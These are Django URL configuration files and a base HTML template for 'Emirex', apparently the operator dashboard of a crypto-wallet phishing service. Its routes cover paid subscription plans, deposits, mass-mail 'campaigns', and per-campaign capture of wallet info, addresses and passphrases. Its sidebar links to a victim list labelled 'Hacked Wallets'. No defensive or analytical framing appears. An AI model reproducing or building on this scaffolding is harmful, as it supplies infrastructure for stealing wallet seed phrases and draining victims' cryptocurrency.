account/urls.py
from django.urls import path
from . import views

app_name = 'account'

urlpatterns = [
  path('register/', views.register, name='register'),
  path('login/', views.user_login, name='login'),
  path('profile/', views.profile, name='profile'),
  path('logout/', views.user_logout, name='logout'),
  path('plans/', views.subscription_plans, name='plans'),
  path('subscribe/<int:plan_id>/', views.subscribe_to_plan, name='subscribe'),
 # path('subscriptions/', views.subscription_list, name='subscriptions'),
  path('deposit/', views.deposit, name='deposit'),
  path('transactions/', views.transaction_history, name='transactions'),
  path('change-password/', views.change_password, name='change_password'),
  #path('crypto-payment/', views.crypto_payment, name='crypto_payment'),
]

core/urls.py
from django.urls import path
from . import views

app_name = 'core'

urlpatterns = [
    path('', views.index, name='index'),
    path('create-campaign/', views.create_campaign, name='create_campaign'),
    path('create-multi-campaign/', views.create_multi_campaign, name='create_multi_campaign'),  # URL for multi campaign creation
    path('campaign/<str:pk>/', views.campaign_detail, name='campaign_detail'),
    path('campaigns/', views.campaign_list, name='campaign_list'),
    path('wallet-info/<str:campaign_id>/', views.wallet_info, name='wallet_info'),  # Include campaign_id
    path('address-info/<str:campaign_id>/', views.address_info, name='address_info'),
    #path('passphrase-info/', views.passphrase_info, name='passphrase_info'),
    path('passphrase-info/<str:campaign_id>/', views.passphrase_info, name='passphrase_info'),
    path('success/<str:pk>/', views.success, name='success'),
    path('victim-info/', views.victim_info_list, name='victim_info_list'),  # Viewing victim info
]

xolo/urls.py
from django.contrib import admin
from django.urls import path, include


urlpatterns = [
    path('admin/', admin.site.urls),
    path('user/', include('account.urls')),
    path('', include('core.urls')),
   # path(r'', include('core.urls')),
]

from django.conf import settings
from django.conf.urls.static import static

if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)

templates/base.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>{% block title %}Emirex{% endblock %}</title>
    <link rel="stylesheet" href="{% static 'css/profile.css' %}">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css" rel="stylesheet">
    {% block extra_css %}{% endblock %}
</head>
<body>
    <div class="container">
        <aside class="sidebar">
            <nav>
                <ul>
                    <li><a href="{% url 'account:profile' %}" class="active">Dashboard</a></li>
                    <li><a href="{% url 'core:create_campaign' %}">Send Mail</a></li>
                    <li><a href="{% url 'account:transactions' %}">Transaction History</a></li>
                    <li><a href="{% url 'account:plans' %}">Subscription Plans</a></li>
                    <li><a href="{% url 'core:campaign_list' %}">Mailing History</a></li>
                    <li><a href="{% url 'core:victim_info_list' %}">Hacked Wallets</a></li>
                    <li><a href="{% url 'account:change_password' %}">Change Password</a></li>
                    <li><a href="{% url 'account:logout' %}">Logout</a></li>
                </ul>
            </nav>
        </aside>
        
        <main class="content">
            <header style="margin: -20px; margin-bottom:10px;">
                <div class="logo">
                    <a href="#" class="logo">
                       <i class="fas fa-cube"></i>
                        <span>Emirex</span>
                    </a>
                </div>
                <button class="sidebar-toggle" id="sidebar-toggle">
                    <i class="fas fa-bars"></i>
                </button>
            </header>

            {% block content %}{% endblock %}
        </main>
    </div>

    <div class="floating-button">
        <a class="btn btn-float" href="https://chat.whatsapp.com/IwGcgf2EPMCA0P4daaKyJ6?text=Hello, I am {{ user.username}} from Emirex!">
            <i class="fas fa-paper-plane"></i> Message Us
        </a>
    </div>

    <footer>
        <div class="footer-content">
            <p>&copy; 2025 Campaign and Account Management. All Rights Reserved.</p>
        </div>
    </footer>

    <script>
        document.addEventListener("DOMContentLoaded", function() {
            const toggleButton = document.getElementById('sidebar-toggle');
            const sidebar = document.querySelector('.sidebar');

            toggleButton.addEventListener('click', function() {
                sidebar.classList.toggle('sidebar-open');
            });

            document.addEventListener('click', function(event) {
                if (!sidebar.contains(event.target) && !toggleButton.contains(event.target)) {
                    sidebar.classList.remove('sidebar-open');
                }
            });
        });
    </script>
</body>
</html>